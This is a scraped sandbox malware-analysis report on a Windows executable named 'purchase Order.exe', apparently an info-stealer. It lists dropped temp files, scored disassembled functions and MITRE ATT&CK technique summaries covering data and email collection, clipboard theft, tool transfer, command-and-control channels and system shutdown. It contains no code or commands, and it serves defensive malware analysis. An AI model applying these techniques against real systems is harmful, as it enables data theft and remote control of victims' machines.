Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Dalis

C:\Users\user\AppData\Local\Temp\aut2EA4.tmp

C:\Users\user\AppData\Local\Temp\z5f52P3-

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
purchase Order.exe

Function 00C6B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00C43D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00C5DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00C4406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00C8FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00C43F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00C8BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00C43742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00C43E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00C6ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 00C436B8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44
COMMON

Function 017CD438 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00C449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre